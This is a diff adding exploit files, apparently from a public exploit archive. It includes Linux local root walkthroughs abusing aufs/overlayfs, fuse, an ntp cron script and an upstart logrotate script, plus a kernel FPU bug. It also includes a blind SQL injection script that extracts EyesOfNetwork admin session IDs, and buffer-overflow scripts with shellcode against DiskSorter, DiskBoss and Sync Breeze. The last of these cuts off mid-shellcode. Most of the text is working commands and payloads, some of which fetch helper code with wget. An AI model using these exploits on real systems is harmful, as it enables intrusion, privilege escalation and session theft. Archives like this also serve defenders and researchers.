+test$ ./UserNamespaceExec -- /bin/bash
+root$ mount -t aufs -o br=work:fuse none mnt
+root$ cd mnt
+# Now cwd of the former process is within the aufs mount. Use
+# another shell to complete.
+test$ /proc/2390/cwd/file /bin/bash
+root$ id
+uid=0(root) gid=100(users) groups=100(users)
+# Go back to old shell for cleanup.
+root$ cd ..; umount mnt; exit
+test$ fusermount -u fuse
+
+Discussion: In my opinion, fuse filesystem allowed pretending to have files with different UIDs/GIDs in the local mount namespace, but they never had those properties, those files would have, when really stored on local disk. So e.g., the SUID binaries lost their SUID-properties and the owner could also modify arbitrary file content, even if file attributes were pretending, that he does not have access - by having control over the fuse process simulating the filesystem, such access control is futile. That is also the reason, why no other user than the one mounting the filesystem may have rights to access it by default.
+In my optionion the workarounds should be to restrict access to fuse also only to the mount namespace where it was created.
+
+## AUFS Xattr Setgid Privilege Escalation
+
+Method: Due to inheritance of Posix ACL information (xattrs) when aufs is copying files and not cleaning those additional and unintended ACL attribues, SGID directories may become user writable, thus allowing to gain privileges of this group using methods described in SetgidDirectoryPrivilegeEscalation (http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/). Suitable target directories can be easily found using find / -perm -02020 2> /dev/null. On standard Ubuntu system those are:
+/usr/local/lib/python3.4 (root.staff)
+/var/lib/libuuid (libuuid.libuuid)
+/var/local (root.staff)
+/var/mail (root.mail)
+
+Exploitation can be done just combining standard tools with the SetgidDirectoryPrivilegeEscalation (http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/) exploit.
+
+test$ wget -q http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/CreateSetgidBinary.c http://www.halfdog.net/Misc/Utils/UserNamespaceExec.c http://www.halfdog.net/Misc/Utils/SuidExec.c
+test$ gcc -o CreateSetgidBinary CreateSetgidBinary.c
+test$ gcc -o UserNamespaceExec UserNamespaceExec.c
+test$ gcc -o SuidExec SuidExec.c
+test$ mkdir mnt test
+test$ setfacl -m "d:u:$(id -u):rwx" test
+test$ ./UserNamespaceExec -- /bin/bash
+root$ mount -t aufs -o br=test:/var none mnt
+root$ chmod 07777 mnt/mail
+root$ umount mnt; exit
+test$ ./CreateSetgidBinary test/mail/escalate /bin/mount x nonexistent-arg
+test$ test/mail/escalate ./SuidExec /usr/bin/id
+uid=1000(test) gid=8(mail) groups=8(mail),100(users)
+
+On Ubuntu, exploitation allows interference with mail spool and allows to gain privileges of other python processes using python dist-packages owned by user root.staff. If root user calls a python process in that way, e.g. via apport crash dump tool, local root escalation is completed.
+
+According to this post (http://www.openwall.com/lists/oss-security/2016/01/16/7), directories or binaries owned by group staff are in the default PATH of the root user, hence local root escalation is trivial.
--- a/platforms/linux/local/41762.txt
+++ b/platforms/linux/local/41762.txt
@ -0,0 +1,50 @@
+Source: http://www.halfdog.net/Security/2016/UserNamespaceOverlayfsXattrSetgidPrivilegeEscalation/
+
+## Introduction
+
+### Problem description: 
+Linux user namespace allows to mount file systems as normal user, including the overlayfs. As many of those features were not designed with namespaces in mind, this increase the attack surface of the Linux kernel interface.
+Overlayfs was intended to allow create writeable filesystems when running on readonly medias, e.g. on a live-CD. In such scenario, the lower filesystem contains the read-only data from the medium, the upper filesystem part is mixed with the lower part. This mixture is then presented as an overlayfs at a given mount point. When writing to this overlayfs, the write will only modify the data in upper, which may reside on a tmpfs for that purpose.
+
+Due to inheritance of Posix ACL information (xattrs) when copying up overlayfs files and not cleaning those additional and unintended ACL attribues, SGID directories may become user writable, thus allowing to gain privileges of this group using methods described in SetgidDirectoryPrivilegeEscalation. On standard Ubuntu system, this allows to gain access to groups staff, mail, libuuid.
+
+## Methods
+
+### Target Selection: 
+Suitable target directories can be easily found using find / -perm -02020 2> /dev/null. On standard Ubuntu system those are:
+/usr/local/lib/python3.4 (root.staff)
+/var/lib/libuuid (libuuid.libuuid)
+/var/local (root.staff)
+/var/mail (root.mail)
+
+### Exploitation: 
+Exploitation can be done just combining standard tools with the SetgidDirectoryPrivilegeEscalation exploit. The following steps include command variants needed for different operating systems. They have to be executed in two processes, one inside the user namespace, the other one outside of it.
+
+### Inside:
+
+test$ wget -q http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/CreateSetgidBinary.c http://www.halfdog.net/Misc/Utils/UserNamespaceExec.c http://www.halfdog.net/Misc/Utils/SuidExec.c
+test$ gcc -o CreateSetgidBinary CreateSetgidBinary.c
+test$ gcc -o UserNamespaceExec UserNamespaceExec.c
+test$ gcc -o SuidExec SuidExec.c
+test$ ./UserNamespaceExec -- /bin/bash
+root# mkdir mnt test work
+root# mount -t overlayfs -o lowerdir=[parent of targetdir],upperdir=test overlayfs mnt # Ubuntu Trusty
+root# mount -t overlayfs -o lowerdir=[parent of targetdir],upperdir=test,workdir=work overlayfs mnt # Ubuntu Wily
+
+### Outside:
+
+test$ setfacl -m d:u:test:rwx test # Ubuntu Trusty
+test$ setfacl -m d:u::rwx,d:u:test:rwx work/work # Ubuntu Wily
+
+### Inside:
+
+root# chmod 02777 mnt/[targetdir]
+root# umount mnt
+
+### Outside:
+
+test$ ./CreateSetgidBinary test/[targetdir]/escalate /bin/mount x nonexistent-arg
+test$ test/[targetdir]/escalate ./SuidExec /bin/bash
+test$ touch x
+test$ ls -al x
+-rw-r--r-- 1 test [targetgroup] 0 Jan 16 20:39 x
--- a/platforms/linux/local/41763.txt
+++ b/platforms/linux/local/41763.txt
@ -0,0 +1,36 @@
+Source: http://www.halfdog.net/Security/2016/OverlayfsOverFusePrivilegeEscalation/
+
+## Introduction
+
+Problem description: On Ubuntu Wily it is possible to place an USERNS overlayfs mount over a fuse mount. The fuse filesystem may contain SUID binaries, but those cannot be used to gain privileges due to nosuid mount options. But when touching such an SUID binary via overlayfs mount, this will trigger copy_up including all file attributes, thus creating a real SUID binary on the disk.
+
+## Methods
+
+Basic exploitation sequence is:
+
+Mount fuse filesystem exposing one world writable SUID binary
+Create USERNS
+Mount overlayfs on top of fuse
+Open the SUID binary RDWR in overlayfs, thus triggering copy_up
+This can be archived, e.g.
+
+SuidExec (http://www.halfdog.net/Misc/Utils/SuidExec.c)
+FuseMinimal (http://www.halfdog.net/Security/2016/OverlayfsOverFusePrivilegeEscalation/FuseMinimal.c)
+UserNamespaceExec (http://www.halfdog.net/Misc/Utils/UserNamespaceExec.c)
+
+test# mkdir fuse
+test# mv SuidExec RealFile
+test# ./FuseMinimal fuse
+test# ./UserNamespaceExec -- /bin/bash
+root# mkdir mnt upper work
+root# mount -t overlayfs -o lowerdir=fuse,upperdir=upper,workdir=work overlayfs mnt
+root# touch mnt/file
+touch: setting times of ‘mnt/file’: Permission denied
+root# umount mnt
+root# exit
+test# fusermount -u fuse
+test# ls -al upper/file
+-rwsr-xr-x 1 root root 9088 Jan 22 09:18 upper/file
+test# upper/file /bin/bash
+root# id
+uid=0(root) gid=100(users) groups=100(users)
--- a/platforms/linux/local/41764.txt
+++ b/platforms/linux/local/41764.txt
@ -0,0 +1,62 @@
+Source: http://www.halfdog.net/Security/2015/NtpCronjobUserNtpToRootPrivilegeEscalation/
+
+## Introduction
+
+### Problem description:
+The cronjob script bundled with ntp package is intended to perform cleanup on statistics files produced by NTP daemon running with statistics enabled. The script is run as root during the daily cronjobs all operations on the ntp-user controlled statistics directory without switching to user ntp. Thus all steps are performed with root permissions in place.
+
+Due to multiple bugs in the script, a malicious ntp user can make the backup process to overwrite arbitrary files with content controlled by the attacker, thus gaining root privileges. The problematic parts in /etc/cron.daily/ntp are:
+
+find "$statsdir" -type f -mtime +7 -exec rm {} \;
+
+# compress whatever is left to save space
+cd "$statsdir"
+ls *stats.???????? > /dev/null 2>&1
+if [ $? -eq 0 ]; then
+  # Note that gzip won't compress the file names that
+  # are hard links to the live/current files, so this
+  # compresses yesterday and previous, leaving the live
+  # log alone.  We supress the warnings gzip issues
+  # about not compressing the linked file.
+  gzip --best --quiet *stats.???????? 
+
+Relevant targets are:
+
+find and rm invocation is racy, symlinks on rm
+rm can be invoked with one attacker controlled option
+ls can be invoked with arbitrary number of attacker controlled command line options
+gzip can be invoked with arbitrary number of attacker controlled options
+
+##  Methods
+
+### Exploitation Goal: 
+A sucessful attack should not be mitigated by symlink security restrictions. Thus the general POSIX/Linux design weakness of missing flags/syscalls for safe opening of path without the setfsuid workaround has to be targeted. See FilesystemRecursionAndSymlinks (http://www.halfdog.net/Security/2010/FilesystemRecursionAndSymlinks/) on that.
+
+### Demonstration: 
+First step is to pass the ls check in the script to trigger gzip, which is more suitable to perform file system changes than ls for executing arbitrary code. As this requires passing command line options to gzip which are not valid for ls, content of statsdir has to be modified exactly in between. This can be easily accomplished by preparing suitable entries in /var/lib/ntp and starting one instance of DirModifyInotify.c (http://www.halfdog.net/Misc/Utils/DirModifyInotify.c) as user ntp:
+
+cd /var/lib/ntp
+mkdir astats.01234567 bstats.01234567
+# Copy away library, we will have to restore it afterwards. Without
+# that, login is disabled on console, via SSH, ...
+cp -a -- /lib/x86_64-linux-gnu/libpam.so.0.83.1 .
+gzip < /lib/x86_64-linux-gnu/libpam.so.0.83.1 > astats.01234567/libpam.so.0.83.1stats.01234567
+./DirModifyInotify --Watch bstats.01234567 --WatchCount 5 --MovePath bstats.01234567 --MoveTarget -drfSstats.01234567 &
+
+With just that in place, DirModifyInotify will react to the actions of ls, move the directory and thus trigger recursive decompression in gzip instead of plain compression. While gzip is running, the directory astats.01234567 has to replaced also to make it overwrite arbitrary files as user root. As gzip will attempt to restore uid/gid of compressed file to new uncompressed version, this will just change the ownership of PAM library to ntp user.
+
+./DirModifyInotify --Watch astats.01234567 --WatchCount 12 --MovePath astats.01234567 --MoveTarget disabled --LinkTarget /lib/x86_64-linux-gnu/
+
+After the daily cron jobs were run once, libpam.so.0.83.1 can be temporarily replaced, e.g. to create a SUID binary for escalation.
+
+LibPam.c (http://www.halfdog.net/Security/2015/NtpCronjobUserNtpToRootPrivilegeEscalation/LibPam.c)
+SuidExec.c (http://www.halfdog.net/Misc/Utils/SuidExec.c)
+
+gcc -Wall -fPIC -c LibPam.c
+ld -shared -Bdynamic LibPam.o -L/lib -lc -o libPam.so
+cat libPam.so > /lib/x86_64-linux-gnu/libpam.so.0.83.1
+gcc -o Backdoor SuidExec.c
+/bin/su
+# Back to normal
+./Backdoor /bin/sh -c 'cp --preserve=mode,timestamps -- libpam.so.0.83.1 /lib/x86_64-linux-gnu/libpam.so.0.83.1; chown root.root /lib/x86_64-linux-gnu/libpam.so.0.83.1; exec /bin/sh'
+
--- a/platforms/linux/local/41765.txt
+++ b/platforms/linux/local/41765.txt
@ -0,0 +1,40 @@
+Source: http://www.halfdog.net/Security/2015/UpstartLogrotationPrivilegeEscalation/
+
+## Introduction
+
+Problem description: Ubuntu Vivid 1504 (development branch) installs an insecure upstart logrotation script which will read user-supplied data from /run/user/[uid]/upstart/sessions and pass then unsanitized to an env command. As user run directory is user-writable, the user may inject arbitrary commands into the logrotation script, which will be executed during daily cron job execution around midnight with root privileges.
+
+## Methods
+
+The vulnerability is very easy to trigger as the logrotation script /etc/cron.daily/upstart does not perform any kind of input sanitation:
+
+
+#!/bin/sh
+
+# For each Upstart Session Init, emit "rotate-logs" event, requesting
+# the session Inits to rotate their logs. There is no user-daily cron.
+#
+# Doing it this way does not rely on System Upstart, nor
+# upstart-event-bridge(8) running in the Session Init.
+#
+# Note that system-level Upstart logs are handled separately using a
+# logrotate script.
+
+[ -x /sbin/initctl ] || exit 0
+
+for session in /run/user/*/upstart/sessions/*
+do
+    env $(cat $session) /sbin/initctl emit rotate-logs >/dev/null 2>&1 || true
+done
+
+On a system with e.g. libpam-systemd installed, standard login on TTY or via SSH will create the directory /run/user/[uid] writable to the user. By preparing a suitable session file, user supplied code will be run during the daily cron-jobs. Example:
+
+
+cat <<EOF > "${HOME}/esc"
+#!/bin/sh
+touch /esc-done
+EOF
+chmod 0755 "${HOME}/esc"
+
+mkdir -p /run/user/[uid]/upstart/sessions
+echo "- ${HOME}/esc" > /run/user/[uid]/upstart/sessions/x
--- a/platforms/linux/local/41766.txt
+++ b/platforms/linux/local/41766.txt
@ -0,0 +1,21 @@
+Source: http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/
+
+## Introduction
+
+Problem description: The initial observation was, that the linux vm86 syscall, which allows to use the virtual-8086 mode from userspace for emulating of old 8086 software as done with dosemu, was prone to trigger FPU errors. Closer analysis showed, that in general, the handling of the FPU control register and unhandled FPU-exception could trigger CPU-exceptions at unexpected locations, also in ring-0 code. Key player is the emms instruction, which will fault when e.g. cr0 has bits set due to unhandled errors. This only affects kernels on some processor architectures, currently only AMD K7/K8 seems to be relevant.
+
+## Methods
+
+Virtual86SwitchToEmmsFault.c (http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/Virtual86SwitchToEmmsFault.c) was the first POC, that triggers kernel-panic via vm86 syscall. Depending on task layout and kernel scheduler timing, the program might just cause an OOPS without heavy side-effects on the system. OOPS might happen up to 1min after invocation, depending on the scheduler operation and which of the other tasks are using the FPU. Sometimes it causes recursive page faults, thus locking up the entire machine.
+
+To allow reproducible tests on at least a local machine, the random code execution test tool (Virtual86RandomCode.c - http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/Virtual86RandomCode.c) might be useful. It still uses the vm86-syscall, but executes random code, thus causing the FPU and task schedule to trigger a multitude of faults and to faster lock-up the system. When executed via network, executed random data can be recorded and replayed even when target machine locks up completely. Network test:
+
+socat TCP4-LISTEN:1234,reuseaddr=1,fork=1 EXEC:./Virtual86RandomCode,nofork=1
+
+tee TestInput < /dev/urandom | socat - TCP4:x.x.x.x:1234 > ProcessedBlocks
+
+An improved version allows to bring the FPU into the same state without using the vm86-syscall. The key instruction is fldcw (floating point unit load control word). When enabling exceptions in one process just before exit, the task switch of two other processes later on might fail. It seems that due to that failure, the task->nsproxy ends up being NULL, thus causing NULL-pointer dereference in exit_shm during do_exit.
+When the NULL-page is mapped, the NULL-dereference could be used to fake a rw-semaphore data structure. In exit_shm, the kernel attemts to down_write the semaphore, which adds the value 0xffff0001 at a user-controllable location. Since the NULL-dereference does not allow arbitrary reads, the task memory layout is unknown, thus standard change of EUID of running task is not possible. Apart from that, we are in do_exit, so we would have to change another task. A suitable target is the shmem_xattr_handlers list, which is at an address known from System.map. Usually it contains two valid handlers and a NULL value to terminate the list. As we are lucky, the value after NULL is 1, thus adding 0xffff0001 to the position of the NULL-value plus 2 will will turn the NULL into 0x10000 (the first address above mmap_min_addr) and the following 1 value into NULL, thus terminating the handler list correctly again.
+The code to perform those steps can be found in FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage.c (http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage.c)
+
+The modification of the shmem_xattr_handlers list is completely silent (could be a nice data-only backdoor) until someone performs a getxattr call on a mounted tempfs. Since such a file-system is mounted by default at /run/shm, another program can turn this into arbitrary ring-0 code execution. To avoid searching the process list to give EUID=0, an alternative approach was tested. When invoking the xattr-handlers, a single integer value write to another static address known from System.map (modprobe_path) will change the default modprobe userspace helper pathname from /sbin/modprobe to /tmp//modprobe. When unknown executable formats or network protocols are requested, the program /tmp//modprobe is executed as root, this demo just adds a script to turn /bin/dd into a SUID-binary. dd could then be used to modify libc to plant another backdoor there. The code to perform those steps can be found in ManipulatedXattrHandlerForPrivEscalation.c (http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/ManipulatedXattrHandlerForPrivEscalation.c).
--- a/platforms/php/webapps/41758.txt
+++ b/platforms/php/webapps/41758.txt
@ -0,0 +1,24 @@
+# # # # #
+# Exploit Title: Opensource Classified Ads Script - SQL Injection
+# Google Dork: N/A
+# Date: 29.03.2017
+# Vendor Homepage: http://www.2daybiz.com/
+# Software: http://www.professionalclassifiedscript.com/downloads/opensource-classified-ads-script-2/
+# Demo: http://198.38.86.159/~classic/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/advance_result.php?keyword=[SQL]&adv_search
+# class_2daydiscount :d_hotlisting
+# class_admin :adm_id
+# class_admin :adm_username
+# class_admin :adm_password
+# class_admin :adm_lastvisit
+# class_category :c_id
+# # # # #
--- a/platforms/php/webapps/41774.py
+++ b/platforms/php/webapps/41774.py
@ -0,0 +1,83 @@
+# Exploit Title: EyesOfNetwork (EON) 5.1 Unauthenticated SQL Injection in eonweb leading to remote root
+# Google Dork: intitle:EyesOfNetwork intext:"sponsored by AXIANS"
+# Date: 29/03/2017
+# Exploit Author: Dany Bach
+# Vendor Homepage: https://www.eyesofnetwork.com/
+# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.1-x86_64-bin.iso
+# Version: EyesOfNetwork <= 5.1
+# Tested on: EyesOfNetwork 5.1 and 5.0
+# CVE: None
+# Contact: Dany Bach [@ddxhunter, rioru.github.io]
+# Advisory and description of the complete scenario: https://rioru.github.io/pentest/web/2017/03/28/from-unauthenticated-to-root-supervision.html
+# Fix: None
+
+import time
+from requests import *
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+url = "https://192.168.1.161"
+
+print "[!] Proof of Concept for the Unauthenticated SQL Injection in EyesOfNetwork 5.1 (DELETE statement) - Rioru (@ddxhunter)"
+
+def getTime(page, cookie=""):
+	start = time.time()
+	get(url+page, verify=False, cookies=dict(session_id=cookie))
+	end = time.time()
+	return round(end - start, 2)
+
+# Getting an initial response time to base our next requests around it
+initial_time = getTime("/") - 0.01
+getTime("/logout.php", "rioru' OR user_id!=1 -- -")
+print "[+] The initial request time on %s is %f, getting the number of entries, it could take a while..." % (url, initial_time)
+sleep1_time = getTime("/logout.php", "rioru' OR SLEEP(1)=1337 -- -")
+if (sleep1_time - initial_time >= 1):
+	count = round(sleep1_time)
+	print "[+] Found %d entries in the [sessions] table, deleting every sessions except one" % count
+else:
+	print "[-] The table [sessions] seems empty"
+	exit()
+
+for i in range(int(count) - 1):
+	getTime("/logout.php", "rioru' OR 1=1 LIMIT 1 -- -")
+
+# Get the length
+session_length = 0
+for i in range(12):
+	execTime = getTime("/logout.php", "rioru' OR (SELECT CASE WHEN ((SELECT LENGTH(session_id) FROM DUAL ORDER BY session_id LIMIT 1)="+ str(i+1) +") THEN SLEEP(1) ELSE 1 END)=1337 -- -")
+	if (round(execTime - initial_time) >= 1):
+		session_length = i+1
+		break
+if (session_length == 0):
+	print "[-] Couldn't find the length of the session_id"
+	exit()
+print "[+] Found an admin session length: %d, getting the session_id" % session_length
+
+# Get the session_id
+print "[+] session_id: ",
+session_id = ""
+for i in range(session_length):
+	for j in range(10):
+		execTime = getTime("/logout.php", "rioru' OR (SELECT CASE WHEN (SUBSTRING((SELECT session_id FROM DUAL ORDER BY session_id LIMIT 1),"+ str(i+1) +",1)="+ str(j) +") THEN SLEEP(1) ELSE 1 END)=1337 -- -")
+		if (round(execTime - initial_time) >= 1):
+			session_id += str(j)
+			print str(j),
+			break
+print "\n[+] final session_id: [%s]" % session_id
+
+# Get the username
+execTime = getTime("/logout.php", "rioru' OR (SELECT CASE WHEN ((SELECT user_name FROM users WHERE user_id=1)='admin') THEN SLEEP(1) ELSE 1 END)=1337 -- -")
+if (round(execTime - initial_time) >= 1):
+	print "[+] Username is [admin]"
+else:
+	print "[-] Username is not admin, brute force necessary"
+
+print "[+] End of the PoC use these cookies to authenticate to Eonweb:"
+print "session_id: %s;" % session_id
+print "user_name: %s;" % "admin"
+print "user_id: %d;" % 1
+print "user_limitation: %d;" % 0
+print "group_id: %d;" % 1
+
+# Root privileges can be gained using snmpd once authenticated
--- a/platforms/windows/local/41771.py
+++ b/platforms/windows/local/41771.py
@ -0,0 +1,44 @@
+#!/usr/bin/env python
+
+# Exploit Title: DiskSorter Enterprise 9.5.12 - 'Import Command' Buffer Overflow (SEH)
+# Date: 2017-03-29
+# Exploit Author: Daniel Teixeira
+# Author Homepage: www.danielteixeira.com
+# Vendor Homepage: http://www.disksorter.com
+# Software Link: http://www.disksorter.com/setups/disksorterent_setup_v9.5.12.exe
+# Version: 9.5.12
+# Tested on: Windows 7 SP1 x86
+
+import os,struct
+
+#Buffer overflow
+junk = "A" * 1536
+
+#JMP ESP (QtGui4.dll)
+jmpesp= struct.pack('<L',0x651bb77a)
+
+#NOPS
+nops = "\x90"
+
+#LEA   EAX, [ESP+76]
+esp = "\x8D\x44\x24\x4C"
+#JMP ESP
+jmp = "\xFF\xE0"
+
+#JMP Short = EB 05
+nSEH = "\x90\x90\xEB\x05" #Jump short 5
+#POP POP RET (libspp.dll)
+SEH = struct.pack('<L',0x10015FFE)
+
+#CALC.EXE
+shellcode =  "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
+
+#PAYLOAD
+payload = junk + jmpesp + nops * 16 + esp + jmp + nops * 68 + nSEH + SEH + nops * 10 + shellcode + nops * 5000
+
+#FILE
+file='<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + payload + '\n</classify>'
+
+f = open('Exploit.xml', 'w')
+f.write(file)
+f.close()
--- a/platforms/windows/local/41772.py
+++ b/platforms/windows/local/41772.py
@ -0,0 +1,44 @@
+#!/usr/bin/env python
+
+# Exploit Title: DiskBoss Enterprise v7.8.16 - 'Import Command' Buffer Overflow
+# Date: 2017-03-29
+# Exploit Author: Daniel Teixeira
+# Author Homepage: www.danielteixeira.com
+# Vendor Homepage: http://www.diskboss.com
+# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v7.8.16.exe
+# Version: 9.5.12
+# Tested on: Windows 7 SP1 x86
+
+import os,struct
+
+#Buffer overflow
+junk = "A" * 1536
+
+#JMP ESP (QtGui4.dll)
+jmpesp= struct.pack('<L',0x651bb77a)
+
+#NOPS
+nops = "\x90"
+
+#LEA   EAX, [ESP+76]
+esp = "\x8D\x44\x24\x4C"
+#JMP ESP
+jmp = "\xFF\xE0"
+
+#JMP Short = EB 05
+nSEH = "\x90\x90\xEB\x05" #Jump short 5
+#POP POP RET (libspp.dll)
+SEH = struct.pack('<L',0x10015FFE)
+
+#CALC.EXE
+shellcode =  "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
+
+#PAYLOAD
+payload = junk + jmpesp + nops * 16 + esp + jmp + nops * 68 + nSEH + SEH + nops * 10 + shellcode + nops * 5000
+
+#FILE
+file='<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + payload + '\n</classify>'
+
+f = open('Exploit.xml', 'w')
+f.write(file)
+f.close()
--- a/platforms/windows/local/41773.py
+++ b/platforms/windows/local/41773.py
@ -0,0 +1,44 @@
+#!/usr/bin/env python
+
+# Exploit Title: Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (SEH)
+# Date: 2017-03-29
+# Exploit Author: Daniel Teixeira
+# Author Homepage: www.danielteixeira.com
+# Vendor Homepage: http://www.syncbreeze.com
+# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.5.16.exe
+# Version: 9.5.16
+# Tested on: Windows 7 SP1 x86
+
+import os,struct
+
+#Buffer overflow
+junk = "A" * 1536
+
+#JMP ESP (QtGui4.dll)
+jmpesp= struct.pack('<L',0x651bb77a)
+
+#NOPS
+nops = "\x90"
+
+#LEA   EAX, [ESP+76]
+esp = "\x8D\x44\x24\x4C"
+#JMP ESP
+jmp = "\xFF\xE0"
+
+#JMP Short = EB 05
+nSEH = "\x90\x90\xEB\x05" #Jump short 5
+#POP POP RET (libspp.dll)
+SEH = struct.pack('<L',0x10015FFE)
+
+#CALC.EXE
+shellcode =  "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
+
+#PAYLOAD
+payload = junk + jmpesp + nops * 16 + esp + jmp + nops * 68 + nSEH + SEH + nops * 10 + shellcode + nops * 5000
+
+#FILE
+file='<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + payload + '\n</classify>'
+
+f = open('Exploit.xml', 'w')
+f.write(file)
+f.close()
--- a/platforms/windows/remote/41775.py
+++ b/platforms/windows/remote/41775.py
@ -0,0 +1,82 @@
+#!/usr/bin/env python
+
+# Exploit Title: Sync Breeze Enterprise v9.5.16 - Remote buffer overflow (SEH)
+# Date: 2017-03-29
+# Exploit Author: Daniel Teixeira
+# Vendor Homepage: http://syncbreeze.com
+# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.5.16.exe
+# Version: 9.5.16
+# Tested on: Windows 7 SP1 x86
+
+import socket,os,time,struct
+
+host = "192.168.2.186"
+port = 80
+
+#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -b "\x00\x09\x0a\x0d\x20" -f python
+shellcode =  ""
+shellcode += "\xd9\xc0\xd9\x74\x24\xf4\x5e\xbf\xb0\x9b\x0e\xf2\x33"
+shellcode += "\xc9\xb1\x53\x31\x7e\x17\x83\xee\xfc\x03\xce\x88\xec"
+shellcode += "\x07\xd2\x47\x72\xe7\x2a\x98\x13\x61\xcf\xa9\x13\x15"
+shellcode += "\x84\x9a\xa3\x5d\xc8\x16\x4f\x33\xf8\xad\x3d\x9c\x0f"
+shellcode += "\x05\x8b\xfa\x3e\x96\xa0\x3f\x21\x14\xbb\x13\x81\x25"
+shellcode += "\x74\x66\xc0\x62\x69\x8b\x90\x3b\xe5\x3e\x04\x4f\xb3"
+shellcode += "\x82\xaf\x03\x55\x83\x4c\xd3\x54\xa2\xc3\x6f\x0f\x64"
+shellcode += "\xe2\xbc\x3b\x2d\xfc\xa1\x06\xe7\x77\x11\xfc\xf6\x51"
+shellcode += "\x6b\xfd\x55\x9c\x43\x0c\xa7\xd9\x64\xef\xd2\x13\x97"
+shellcode += "\x92\xe4\xe0\xe5\x48\x60\xf2\x4e\x1a\xd2\xde\x6f\xcf"
+shellcode += "\x85\x95\x7c\xa4\xc2\xf1\x60\x3b\x06\x8a\x9d\xb0\xa9"
+shellcode += "\x5c\x14\x82\x8d\x78\x7c\x50\xaf\xd9\xd8\x37\xd0\x39"
+shellcode += "\x83\xe8\x74\x32\x2e\xfc\x04\x19\x27\x31\x25\xa1\xb7"
+shellcode += "\x5d\x3e\xd2\x85\xc2\x94\x7c\xa6\x8b\x32\x7b\xc9\xa1"
+shellcode += "\x83\x13\x34\x4a\xf4\x3a\xf3\x1e\xa4\x54\xd2\x1e\x2f"
+shellcode += "\xa4\xdb\xca\xda\xac\x7a\xa5\xf8\x51\x3c\x15\xbd\xf9"
+shellcode += "\xd5\x7f\x32\x26\xc5\x7f\x98\x4f\x6e\x82\x23\x7e\x33"
+shellcode += "\x0b\xc5\xea\xdb\x5d\x5d\x82\x19\xba\x56\x35\x61\xe8"
+shellcode += "\xce\xd1\x2a\xfa\xc9\xde\xaa\x28\x7e\x48\x21\x3f\xba"
+shellcode += "\x69\x36\x6a\xea\xfe\xa1\xe0\x7b\x4d\x53\xf4\x51\x25"
+shellcode += "\xf0\x67\x3e\xb5\x7f\x94\xe9\xe2\x28\x6a\xe0\x66\xc5"
+shellcode += "\xd5\x5a\x94\x14\x83\xa5\x1c\xc3\x70\x2b\x9d\x86\xcd"
+shellcode += "\x0f\x8d\x5e\xcd\x0b\xf9\x0e\x98\xc5\x57\xe9\x72\xa4"
+shellcode += "\x01\xa3\x29\x6e\xc5\x32\x02\xb1\x93\x3a\x4f\x47\x7b"
